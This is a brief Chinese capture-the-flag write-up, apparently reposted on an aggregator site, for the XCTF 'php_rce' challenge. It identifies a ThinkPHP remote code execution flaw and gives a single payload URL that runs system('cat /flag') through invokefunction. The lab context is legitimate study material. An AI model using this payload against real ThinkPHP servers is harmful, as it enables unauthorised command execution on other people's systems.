XCTF Web 高手区003: php_rce - 走看看

zoukankan html css js c++ java

XCTF Web 高手区003: php_rce

题目：

WP：
看到题目就知道是thinkphp的远程执行漏洞
这里大家可以看一下这位大佬是末初呀~的博客，他对thinkphp的相关知识讲的很棒

我们直接上payload：

http://111.198.29.45:45747/index.php? s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

得到flag

查看全文

相关阅读:
小错误
 创建表空间
 mysql
myeclipse
linux命令小结
 jquery
java基础
 【学习笔记】【多项式】多项式插值相关_个人学习用
 SHUoj 神无月排位赛
 SHUoj 字符串进制转换

原文地址：https://www.cnblogs.com/Locking-Shonn/p/12622697.html

Copyright © 2011-2022 走看看